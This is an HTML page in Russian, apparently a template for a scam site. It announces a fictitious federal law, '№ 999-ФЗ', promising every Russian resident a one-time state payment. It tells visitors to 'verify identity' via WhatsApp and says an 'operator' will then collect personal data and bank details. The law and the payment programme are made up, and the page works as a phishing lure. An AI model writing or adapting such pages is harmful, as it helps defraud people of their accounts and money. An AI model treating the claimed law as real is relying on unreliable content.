<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="src/style.css">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Oswald&display=swap" rel="stylesheet">
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet">
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css" rel="stylesheet">
    <link href='https://fonts.googleapis.com/css?family=Lato' rel='stylesheet' type='text/css'>
    <title>Document</title>
</head>
<body>
    <main>
        <section class="section-button">
            <h1>Пройти верефикацию личности и полчуить выплату</h1>
            <div class="button-cont">
                <a href="https://youtube.com"><button class="btn btn-4 btn-sep">Пройти</button></a>
            </div>
        </section>
        <section class="section-hero">
            <div class="discription">
                <h1><span class="red">Закон о всесторонней социальной поддержке: </span>Каждому жителю Российской Федерации полагается единоразовая гарантированная выплата</h1>
                <img src="img/pngwing.com.png" alt="">
            </div>
        </section>
        <section class="section-law">
            <img src="img/pngwing.com (1).png" alt="">
            <div class="discription-law">
                <h1>Номер закона: № 999-ФЗ "О гарантированной социальной помощи гражданам Российской Федерации"</h1>
                <p>Согласно этому закону, каждый гражданин России имеет право на получение единоразовой гарантированной выплаты в рамках программы государственной социальной поддержки. Данная выплата направлена на помощь гражданам в периоды экономических трудностей или кризисов.</p>
            </div>
        </section>
        <section class="section-info">
            <div class="container cont-one">
                <img src="img/info.png" alt="">
                <p>Для получения этой выплаты необходимо пройти верификацию личности через популярный мессенджер WhatsApp на специальной странице государственного портала. После успешной верификации оператор свяжется с заявителем для подтверждения личных данных и указания реквизитов для получения гарантированной выплаты.</p>
            </div>
            <div class="container cont-two">
                <img src="img/info.png" alt="">
                <p>Данная программа направлена на обеспечение временной финансовой поддержки гражданам в трудные периоды и улучшение социального благополучия в стране.
                </p>
            </div>
            <div class="container cont-two">
                <img src="img/info.png" alt="">
                <p>Операторы, представляющие государственные органы, будут осуществлять связь с гражданами для оформления выплаты. Просим граждан быть внимательными и не предоставлять личные данные третьим лицам или на ненадежных интернет-ресурсах.
                </p>
            </div>
        </section>
    </main>
</body>
</html>